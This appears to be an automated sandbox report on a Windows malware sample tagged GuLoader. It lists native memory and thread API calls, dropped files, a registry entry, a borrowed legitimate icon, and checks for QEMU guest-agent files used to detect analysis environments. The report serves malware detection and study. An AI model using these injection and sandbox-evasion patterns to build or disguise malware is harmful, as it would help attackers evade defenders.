      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E28C04_2_1D7E28C0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D89F8724_2_1D89F872
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7F68824_2_1D7F6882
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D854BC04_2_1D854BC0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E0B104_2_1D7E0B10
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D89FB2E4_2_1D89FB2E
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D89FA894_2_1D89FA89
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D89CA134_2_1D89CA13
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D89EA5B4_2_1D89EA5B
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7FFAA04_2_1D7FFAA0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D89F5C94_2_1D89F5C9
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D8975C64_2_1D8975C6
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D8AA5264_2_1D8AA526
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E04454_2_1D7E0445
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E27604_2_1D7E2760
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7EA7604_2_1D7EA760
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D8967574_2_1D896757
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D89A6C04_2_1D89A6C0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D8536EC4_2_1D8536EC
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D89F6F64_2_1D89F6F6
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7FC6004_2_1D7FC600
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7DC6E04_2_1D7DC6E0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D87D62C4_2_1D87D62C
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D88D6464_2_1D88D646
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D8046704_2_1D804670
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E06804_2_1D7E0680
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7CF1134_2_1D7CF113
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D8A010E4_2_1D8A010E
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7FB1E04_2_1D7FB1E0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D87D1304_2_1D87D130
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E51C04_2_1D7E51C0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D82717A4_2_1D82717A
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D81508C4_2_1D81508C
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D8970F14_2_1D8970F1
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7EB0D04_2_1D7EB0D0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7D00A04_2_1D7D00A0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D88E0764_2_1D88E076
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7EE3104_2_1D7EE310
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D89F3304_2_1D89F330
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7D13804_2_1D7D1380
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7A22454_2_1D7A2245
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7CD2EC4_2_1D7CD2EC
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D89124C4_2_1D89124C
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: String function: 1D827BE4 appears 87 times
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: String function: 1D85EF10 appears 105 times
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: String function: 1D815050 appears 36 times
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: String function: 1D84E692 appears 84 times
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: String function: 1D7CB910 appears 266 times
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 2_2_02ABBEBC NtProtectVirtualMemory,2_2_02ABBEBC
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 2_2_02AB9DB7 NtAllocateVirtualMemory,2_2_02AB9DB7
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D812D10 NtQuerySystemInformation,LdrInitializeThunk,4_2_1D812D10
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D812B90 NtFreeVirtualMemory,LdrInitializeThunk,4_2_1D812B90
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D812B10 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_1D812B10
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D812DA0 NtReadVirtualMemory,4_2_1D812DA0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D812DC0 NtAdjustPrivilegesToken,4_2_1D812DC0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D812D50 NtWriteVirtualMemory,4_2_1D812D50
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D813C90 NtOpenThread,4_2_1D813C90
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D812CD0 NtEnumerateKey,4_2_1D812CD0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D812CF0 NtDelayExecution,4_2_1D812CF0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D812C10 NtOpenProcess,4_2_1D812C10
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D812C20 NtSetInformationFile,4_2_1D812C20
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D812C30 NtMapViewOfSection,4_2_1D812C30
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D813C30 NtOpenProcessToken,4_2_1D813C30
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D812C50 NtUnmapViewOfSection,4_2_1D812C50
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D812FB0 NtSetValueKey,4_2_1D812FB0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D812F00 NtCreateFile,4_2_1D812F00
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D812F30 NtOpenDirectoryObject,4_2_1D812F30
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D812E80 NtCreateProcessEx,4_2_1D812E80
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D812EB0 NtProtectVirtualMemory,4_2_1D812EB0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D812EC0 NtQuerySection,4_2_1D812EC0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D812ED0 NtResumeThread,4_2_1D812ED0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D812E00 NtQueueApcThread,4_2_1D812E00
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D812E50 NtCreateSection,4_2_1D812E50
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D8129D0 NtWaitForSingleObject,4_2_1D8129D0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D8129F0 NtReadFile,4_2_1D8129F0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D8138D0 NtGetContextThread,4_2_1D8138D0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D812B80 NtCreateKey,4_2_1D812B80
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D812BC0 NtQueryInformationToken,4_2_1D812BC0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D812BE0 NtQueryVirtualMemory,4_2_1D812BE0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D812B00 NtQueryValueKey,4_2_1D812B00
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D812B20 NtQueryInformationProcess,4_2_1D812B20
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D812A80 NtClose,4_2_1D812A80
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D812AA0 NtQueryInformationFile,4_2_1D812AA0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D812AC0 NtEnumerateValueKey,4_2_1D812AC0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D812A10 NtWriteFile,4_2_1D812A10
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D814570 NtSuspendThread,4_2_1D814570
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D8134E0 NtCreateMutant,4_2_1D8134E0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D814260 NtSetContextThread,4_2_1D814260
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_01671468 NtAllocateVirtualMemory,4_2_01671468
      Source: System.Runtime.CompilerServices.VisualC.dll.2.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeProcess Stats: CPU usage > 98%
      Source: System.Runtime.CompilerServices.VisualC.dll.2.drStatic PE information: No import functions for PE file found
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamevm3dc003.dll> vs SecuriteInfo.com.W32.AIDetect.malware2.5627.exe
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000003.205923926041.000000001D56F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SecuriteInfo.com.W32.AIDetect.malware2.5627.exe
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000002.210672290922.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SecuriteInfo.com.W32.AIDetect.malware2.5627.exe
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000003.205930970835.000000001D720000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SecuriteInfo.com.W32.AIDetect.malware2.5627.exe
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000002.210674141310.000000001DA70000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SecuriteInfo.com.W32.AIDetect.malware2.5627.exe
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: uninstalla.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeSection loaded: edgegdi.dllJump to behavior
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exeVirustotal: Detection: 19%
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exeReversingLabs: Detection: 12%
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeJump to behavior
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe"
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe"
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe" Jump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 2_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,2_2_0040352D
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeFile created: C:\Users\user\AppData\Local\Temp\nsaAD54.tmpJump to behavior
      Source: classification engineClassification label: mal84.troj.evad.winEXE@3/11@1/1
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 2_2_004021AA CoCreateInstance,2_2_004021AA
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 2_2_0040498A GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,2_2_0040498A
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeFile written: C:\Users\user\AppData\Local\Temp\Exolve.iniJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Hardheartedly12Jump to behavior
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
      Source: Binary string: mshtml.pdb source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000001.205793066847.0000000000649000.00000008.00000001.01000000.00000005.sdmp
      Source: Binary string: System.Runtime.CompilerServices.VisualC.ni.pdb source: System.Runtime.CompilerServices.VisualC.dll.2.dr
      Source: Binary string: wntdll.pdbUGP source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000003.205922259478.000000001D44C000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000002.210670854299.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000003.205929254527.000000001D5F3000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000002.210672290922.000000001D8CD000.00000040.00000800.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000003.205922259478.000000001D44C000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000002.210670854299.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000003.205929254527.000000001D5F3000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000002.210672290922.000000001D8CD000.00000040.00000800.00020000.00000000.sdmp
      Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.CompilerServices.VisualC\net6.0-Release\System.Runtime.CompilerServices.VisualC.pdb source: System.Runtime.CompilerServices.VisualC.dll.2.dr
      Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.CompilerServices.VisualC\net6.0-Release\System.Runtime.CompilerServices.VisualC.pdbRSDS source: System.Runtime.CompilerServices.VisualC.dll.2.dr
      Source: Binary string: mshtml.pdbUGP source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000001.205793066847.0000000000649000.00000008.00000001.01000000.00000005.sdmp
      Source: Binary string: d:\build\ob\bora-18379147\bora-vmsoft\build\release-x64\svga\wddm\src\coinstaller\Win8Release\x64\bin\vm3dc003.pdb source: vm3dc003.dll.2.dr

      Data Obfuscation

      barindex
      Yara detected GuLoader
      Source: Yara matchFile source: 00000002.00000002.206448386492.0000000002A5B000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000000.205790119879.0000000001660000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 2_2_713C30C0 push eax; ret 2_2_713C30EE
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 2_2_02AAAF16 push esi; retf 2_2_02AAB000
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 2_2_02AACCD6 pushad ; iretd 2_2_02AACCD7
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 2_2_02AAB002 push esi; retf 2_2_02AAB000
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 2_2_02AAB01E push esi; retf 2_2_02AAB000
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 2_2_02AB59DA pushad ; iretd 2_2_02AB59FA
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 2_2_02AAA52F push cs; iretd 2_2_02AAA532
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 2_2_02AAAF73 push esi; retf 2_2_02AAB000
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 2_2_02AAAF4E push esi; retf 2_2_02AAB000
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 2_2_02AAA158 push ebp; retn 0008h2_2_02AAA159
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7D08CD push ecx; mov dword ptr [esp], ecx4_2_1D7D08D6
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7A97A1 push es; iretd 4_2_1D7A97A8
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7A21AD pushad ; retf 0004h4_2_1D7A223F
      Source: vm3dc003.dll.2.drStatic PE information: section name: .didat
      Source: vm3dc003.dll.2.drStatic PE information: section name: .gehcont
      Source: vm3dc003.dll.2.drStatic PE information: section name: _RDATA
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 2_2_713C1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,2_2_713C1BFF
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exeStatic PE information: real checksum: 0x0 should be: 0xe7640
      Source: System.dll.2.drStatic PE information: real checksum: 0x0 should be: 0x3d68
      Source: uninstalla.exe.2.drStatic PE information: real checksum: 0x3f1bf6 should be: 0x4a8b4
      Source: System.Runtime.CompilerServices.VisualC.dll.2.drStatic PE information: 0xC22B5F28 [Fri Mar 24 23:05:12 2073 UTC]
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeFile created: C:\Users\user\AppData\Local\Temp\System.Runtime.CompilerServices.VisualC.dllJump to dropped file
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeFile created: C:\Users\user\AppData\Local\Temp\uninstalla.exeJump to dropped file
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeFile created: C:\Users\user\AppData\Local\Temp\vm3dc003.dllJump to dropped file
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeFile created: C:\Users\user\AppData\Local\Temp\nswCA44.tmp\System.dllJump to dropped file

      Hooking and other Techniques for Hiding and Protection

      barindex
      Icon mismatch, binary includes an icon from a different legit application in order to fool users
      Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (31).png
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Tries to detect Any.run
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000002.00000002.206448953498.0000000002C91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: NTDLLUSER32KERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 10.0; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSHTML.DLL
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000002.00000002.206448953498.0000000002C91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\System.Runtime.CompilerServices.VisualC.dllJump to dropped file
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\uninstalla.exeJump to dropped file
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\vm3dc003.dllJump to dropped file
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 2_2_02AA8BEA rdtsc 2_2_02AA8BEA
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: K32EnumDeviceDrivers,2_2_02ABC48A
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeAPI coverage: 0.3 %
